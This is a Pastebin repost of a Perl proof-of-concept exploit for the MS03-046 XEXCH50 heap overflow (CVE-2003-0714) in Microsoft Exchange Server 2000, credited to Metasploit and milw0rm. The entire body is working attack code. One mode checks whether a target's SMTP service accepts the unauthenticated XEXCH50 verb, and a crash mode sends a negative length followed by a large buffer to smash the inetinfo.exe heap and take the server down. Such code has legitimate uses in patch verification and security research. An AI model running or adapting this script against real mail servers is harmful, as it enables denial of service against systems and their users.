FlyFar

Microsoft Exchange Server 2000 - XEXCH50 Heap Overflow (PoC) (MS03-046) - CVE-2003-0714

Feb 17th, 2024
100
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 3.05 KB | Cybersecurity | 0 0
  1. #!/usr/bin/perl -w
  2. ##################
  3.  
  4. ##
  5. # ms03-046.pl - hdm metasploit com
  6. # This vulnerability allows a remote unauthenticated user to overwrite big chunks
  7. # of the heap used by the inetinfo.exe process. Reliably exploiting this bug is
  8. # non-trivial; even though the entire buffer is binary safe (even nulls) and can be
  9. # just about any size, the actual code that crashes varies widely with each request.
  10. # During the analysis process, numerous combinations of request size, concurrent
  11. # requests, pre-allocations, and alternate trigger routes were examined and not a
  12. # single duplicate of location and data offset was discovered. Hopefully the magic
  13. # combination of data, size, and setup will be found to allow this bug to be reliably
  14. # exploited.
  15.  
  16. # minor bugfix: look for 354 Send binary data
  17.  
  18. use strict;
  19. use IO::Socket;
  20.  
  21. my $host = shift() || usage();
  22. my $mode = shift() || "CHECK";
  23. my $port = 25;
  24.  
  25.  
  26. if (uc($mode) eq "CHECK") { check() }
  27. if (uc($mode) eq "CRASH") { crash() }
  28.  
  29. usage();
  30.  
  31.  
  32. sub check
  33. {
  34.     my $s = SMTP($host, $port);
  35.     if (! $s)
  36.     {
  37.         print "[*] Error establishing connection to SMTP service.\n";
  38.         exit(0);
  39.     }
  40.  
  41.     print $s "XEXCH50 2 2\r\n";
  42.     my $res = <$s>;    
  43.     close ($s);
  44.  
  45.     # a patched server only allows XEXCH50 after NTLM authentication
  46.     if ($res !~ /354 Send binary/i)
  47.     {
  48.         print "[*] This server has been patched or is not vulnerable.\n";
  49.         exit(0);
  50.     }
  51.  
  52.     print "[*] This system is vulnerable: $host:$port\n";
  53.  
  54.     exit(0);
  55. }
  56.  
  57.  
  58. sub crash
  59. {
  60.     my $s = SMTP($host, $port);
  61.     if (! $s)
  62.     {
  63.         print "[*] Error establishing connection to SMTP service.\n";
  64.         exit(0);
  65.     }
  66.  
  67.     # the negative value allows us to overwrite random heap bits
  68.     print $s "XEXCH50 -1 2\r\n";
  69.     my $res = <$s>;    
  70.  
  71.     # a patched server only allows XEXCH50 after NTLM authentication
  72.     if ($res !~ /354 Send binary/i)
  73.     {
  74.         print "[*] This server has been patched or is not vulnerable.\n";
  75.         exit(0);
  76.     }
  77.  
  78.     print "[*] Sending massive heap-smashing string...\n";
  79.     print $s ("META" x 16384);
  80.  
  81.     # sometimes a second connection is required to trigger the crash
  82.     $s = SMTP($host, $port);
  83.  
  84.     exit(0);
  85. }
  86.  
  87.  
  88. sub usage
  89. {
  90.     print STDERR "Usage: $0 <host> [CHECK|CRASH]\n";
  91.     exit(0);
  92.  
  93. }
  94.  
  95. sub SMTP
  96. {
  97.     my ($host, $port) = @_;
  98.     my $s = IO::Socket::INET->new
  99.     (
  100.         PeerAddr => $host,
  101.         PeerPort => $port,
  102.         Proto    => "tcp"
  103.     ) || return(undef);
  104.  
  105.     my $r = <$s>;
  106.     return undef if !$r;
  107.    
  108.     if ($r !~ /Microsoft/)
  109.     {
  110.         chomp($r);
  111.         print STDERR "[*] This does not look like an exchange server: $r\n";
  112.         return(undef);
  113.     }
  114.    
  115.     print $s "HELO X\r\n";
  116.     $r = <$s>;
  117.     return undef if !$r;  
  118.  
  119.     print $s "MAIL FROM: DoS\r\n";
  120.     $r = <$s>;
  121.     return undef if !$r;
  122.    
  123.     print $s "RCPT TO: Administrator\r\n";
  124.     $r = <$s>;
  125.     return undef if !$r;
  126.    
  127.     return($s);
  128. }
  129.  
  130.  
  131. # milw0rm.com [2003-10-22]
  132.            
Add Comment
Please, Sign In to add comment